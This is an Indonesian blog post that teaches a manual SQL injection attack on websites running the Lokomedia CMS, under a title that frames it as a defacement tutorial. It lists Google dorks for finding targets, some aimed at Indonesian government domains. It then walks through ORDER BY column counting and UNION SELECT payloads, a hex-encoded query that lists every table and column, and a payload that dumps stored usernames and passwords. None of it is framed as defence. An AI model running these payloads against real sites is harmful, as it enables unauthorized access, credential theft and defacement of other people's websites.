Cara deface sqli manual pada cms Lokomedia

label
Hi gaes, pada kesempatan kali ini guwe akan share tutorial cara exploit Sqli Manual di Cms Lokomedia, kemaren gwe udah share dua tutorial  cara SQLi manual dan SQLi Lokomedia, tapi pada kesempatan kali ini gwe akan gabungin dua exploit tersebut menjadi satu.

Kenapa gwe share tutorial ini? Karna gwe udah ngalamin sendiri klo nemu web, tapi gak vuln sqli lokmed dan udah susah payah dorking, karna we ngerasa user dan password gak pernah nemu, jadi we nyari-nyari exploit di Grub Chat, eh nemu nih exploit, ya langsung we share deh.

Kelebihan exploit ini adalah, dapat melihat Database dan Tabel MySql, dengan begitu kita dapat nemuin User dan Password web yang menggunakan CMS Lokomedia.

1. Dorking ke google menggunakan dork berikut ini.
Inurl:berita-23 ext:html
Inurl:hal-tentang-kami.html
Inurl:info-20 ext:html site:.go.id
Kembangin dork, dengan cara urutin nomor 1-300

 2. Setelah nemu target silahkan masukin tanda (') di bagian nomor, seperti bla-bla-27-bla.html, contoh:

https://website.com/info-50'-tanah-laut.html
Ciri2 vuln, biasanya hilang sebagian artikel atau image.
3. Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip,bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali, contoh:
https://website.com/info-50'+order+by+2--+--tanah-laut.html (normal)
https://website.com/info-50'+order+by+6--+--tanah-laut.html (Error)
https://website.com/info-50'+order+by+5--+--tanah-laut.html (normal)
 Berarti jumlah kolom pada database ada 5, karna page yg normal hanya di bagian 1-5, untuk 6-seterusnya error.

4. Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya, Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – atau . di depan angka, contoh:
https://website.com/info-.50'+union+select+1,2,3,4,5--+--tanah-laut.html
 Nanti akan keluar angka ajaib, contoh angka ajaib saya 2&4.

5. Pemasangan exploit manual, dengan cara tambahkan exploit sqli manual di angka ajaib tersebut, contoh:
https://website.com/info-.50'+uniom+select+1,concat(0x496e6a6563742062792062616475742067616c6175,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5--+--tanah-laut.html
Nanti akan keluar, table dan data, dari situs tersebut.

6. Tinggal mencari atau dump user password, dengan cara ganti exploif di atas dengan exploit dump berikut, contoh:
https://website.com/info-.50'+union+select+1,(select(@x)from(select(@x:=0x00),(select(@x)from(Users)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),3,4,5--+--tanah-laut.html
(Users) di isi dengan table sebelah kiri, dan untuk (username)dan (password) di isi dengan table sebelah kanan.

Sekian pada tutorial kali ini, tera kasih telah berkunjung di blog sederhana ini. Jangan lupa pantengin terus blog gwe, karna akan selalu update exploit terbaru.
Share This :

Related Post



sentiment_satisfied Emoticon